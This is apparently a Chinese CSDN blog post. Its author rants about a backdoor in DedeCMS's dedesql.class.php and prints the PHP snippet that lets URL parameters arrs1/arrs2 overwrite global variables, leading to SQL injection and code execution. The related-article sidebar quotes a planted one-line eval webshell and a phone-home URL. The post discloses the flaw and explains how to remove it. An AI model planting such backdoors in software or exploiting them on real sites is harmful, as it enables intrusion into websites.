必须吐槽下DEDE留的脑残后门

最新推荐文章于 2022-03-09 15:42:59 发布
最新推荐文章于 2022-03-09 15:42:59 发布
阅读量1k 收藏
点赞数
分类专栏: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/UDBIAWDIF/article/details/9136785
版权

dedesql.class.php里有这么一段话:


if(isset($GLOBALS['arrs1']))
{
    $v1 = $v2 = '';
    for($i=0;isset($arrs1[$i]);$i++)
    {
        $v1 .= chr($arrs1[$i]);
    }
    for($i=0;isset($arrs2[$i]);$i++)
    {
        $v2 .= chr($arrs2[$i]);
    }
    $GLOBALS[$v1] .= $v2;
}

好吧,大家可以在url上构建arrs1和arrs2参数来各种做攻击了,比如把表前缀改了,就可以注入了。。。然后可以执行某处程序生成php文件什么的,各种eval你的代码。。。


我本来还以为这个有什么特殊用途,直到我看到dede的补丁只是把这两个变量重新赋值成dede的版权,此时哥就彻底凌乱了!你特么的加这个原来就只是为了给自己开后门啊我次奥!什么都不说了,直接注释掉,真特么的脑残!

UDBIAWDIF
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DEDE采集大师官方后门的删除办法
10-28
说实话,会故意后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。
php下正则来匹配dede模板标签的代码
12-18
html代码 复制代码 代码如下: <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” ... <head> <... charset=utf-8″ /> <... {t:arc r
dedecms的各种卡哇伊小漏洞
王意林的专栏
07-12 4215
前情提要 前几天和峰哥一起搞网站,遇到了dedecms的模板,大神们分分秒杀的站,蛋疼的弄了两天。于是乎痛定思痛研究了一下他最近出现的漏洞。 漏洞与版本 官方网站上提供了一些以往版本的下载 http://www.dedecms.com/html/chanpinxiazai/list_3_1.html 漏洞信息的话参见SEBUG http://sebug.net/appdir/%E7%B
dedecms官方后门获取你的站点信息
赵一舟的博客
03-09 321
$offUrl = "http://new"."ver.a"."pi.de"."decms.com/index.php?c=info57&version={$cfg_version}&formurl={$nurl}&phpver={$phpv}&os={$sp_os}&mysqlver={$mysql_ver}{$add_query}";
一种奇特的DEDE隐藏后门办法
weixin_30896763的博客
11-23 111
转自:http://www.91ri.org/6462.html 一种奇特的DEDE隐藏后门办法 单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun. 为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢? 无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/...
php采集有后门,DEDE采集大师官方后门的删除办法
weixin_35922953的博客
03-12 166
说实话,会故意后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数...
织梦DEDECMS去除一切自带后门和破绽的办法
PHP错误汇总
09-26 739
DEDECMS去除一切自带后门和破绽的办法 DEDECMS去除所有自带后门和漏洞的方法(DEDE安装之后需要做的事) Dedecms安全步骤,安装之后的操作 1 将文件夹dede改名为其他,比如 /dede58.com/ 2 搜索ad.dedecms.com,文件D:\WebSite\fukedh.com\www\gzadmin\templets\login_ad.htm 删除如下这一段: <!--<script type="text/javascript" src="<?ph
DeDe_ 3.99版 64位可用
10-10
这表明DeDe是一款兼容多种系统环境的应用程序,特别是针对64位系统的优化,确保在这样的环境下能稳定运行。在Windows 7 64位系统上,用户可以期待DeDe提供其全部功能而不会出现兼容性问题。 在Windows操作系统中,...
dede源码多城市分站插件.rar
08-20
描述中提到“dede源码多城市分站插件,可绑定多域名”,意味着该插件不仅支持在同一个网站下建立多个城市分站,还能为每个分站分配不同的域名。这样做的好处是,每个城市的用户可以访问对应城市特定的域名,提高用户...
dedecms言板
小白白的博客
06-12 3030
第一步:登录dede后台,在【核心】---【频道维护】---【自定义表单】中根据需要创建需要的表单。第二步:点击【增加新的自定义表单】,添加在线言表单,(数据表前缀要与自己建的表的前缀一致),点击确定第三步:上一步操作完之后,会返回自定义表单中,点击下面的修改按钮进行添加新字段。第四步:【填加新字段】你知道的。(此处演示,随便填了一个)第五步:在【自定义表单管理】中先进行【前台预览】,点击发布信...
dede php 错误,dedecms的dedesql.class.php on line 489错误的解决方法
weixin_28692867的博客
03-26 93
DedeCmsV5.7安装后,打开网站出现以下错误提示:Fatal error: Call to undefined function parcv() in \include\dedesql.class.php on line 489解决的办法是:打开 include/dedesql.class.php找到:if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = '';...
global与$GLOBALS的区别
YoungerChen的专栏
08-01 688
<?php function f1() { global $v1,$v2; $v2 = &$v1; echo 'f1函数里:'."v1:".$v1."v2:".$v2; } function f2() { $GLOBALS["v3"] = &$GLOBAL
织梦dedecms报错Fatal error: Call to undefined function ParCv()
PHP错误汇总
10-03 105
安装dede UTF_8时报出了一个致命错误和警告,最后不能显示网站后台和首页了。报错如下: 登陆首页显示:Fatal error: Call to undefined function ParCv() in /include/dedesql.class.php on line 489 登陆后台显示:Deprecated: Function ereg_replace() is deprecated in /dede/config.php on line 2 Fatalerror: Call to un
变量为初始化导致本地变量注入
qq_31763129的博客
05-09 508
/include/dedesql.class.php文件,搜索(大概在590行的样子)      if(isset($GLOBALS['arrs1']))      修改为      $arrs1 = array(); $arrs2 = array(); if(isset($GLOBALS['arrs1']))      如果之前定义过$arrs1或$arrs2的,请调整比对代码。      至此...
DedeCMS 5.7 后门漏洞
weixin_33895475的博客
03-21 588
简要描述: DedeCMS V5.7 SP1正式版UTF-8 GBK版本疑似被植入一句话后门前几日下载并不存在此代码 详细说明: shopcar.class.php被植入一句话@eval(file_get_contents('php://input')); 漏洞证明: shopcar.class.php被植入一句话@eval(file_get_contents('php://input'...
php exit dedecms,dedecms 去除一切自带后门和破绽的办法
weixin_35502173的博客
03-10 168
DEDECMS去除所有自带后门和漏洞的方法(DEDE安装之后需要做的事)Dedecms安全步骤,安装之后的操作1 将文件夹dede改名为其他,比如 /dedecms51.com/2 搜索ad.dedecms.com,文件D:\WebSite\fukedh.com\www\gzadmin\templets\login_ad.htm删除如下这一段:3 继续搜索ad.dedecms.com,文件 D:\...
dede 5.3升级
最新发布
09-20
dede是一款非常受欢迎的CMS系统,它有着强大的功能和可定制性。5.3版本的dede是这个CMS系统的升级版本,它带来了一些值得期待的改进和功能更新。 首先,5.3版本对于系统的安全性进行了增强。在现今互联网环境中,网络安全问题越来越突出,所以dede升级版本重点关注了系统的安全性,对一些已知的漏洞进行了修复,并加入了更强的防护机制,保护用户信息和网站数据的安全。 其次,5.3版本还改进了系统的性能和稳定性。优化了系统的代码结构,增强了系统的运行效率,使得网站的加载速度更快,用户的访问体验更加流畅。同时,系统在处理大数据量时也更加稳定,提高了系统的可靠性。 此外,5.3版本还引入了一些新功能和模块。例如,添加了更多的插件和模板选择,让用户可以更加轻松地进行网站的设计和定制。还提供了更多的行业解决方案和样式库,满足用户不同行业和需求的网站建设。 总的来说,dede 5.3升级版本带来了更好的安全性、性能和功能。它为用户提供了更好的使用体验和更多的选择,帮助用户建设出更加安全、稳定、美观的网站。对于已经使用dede的网站来说,升级到5.3版本是一个非常值得考虑的选择。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值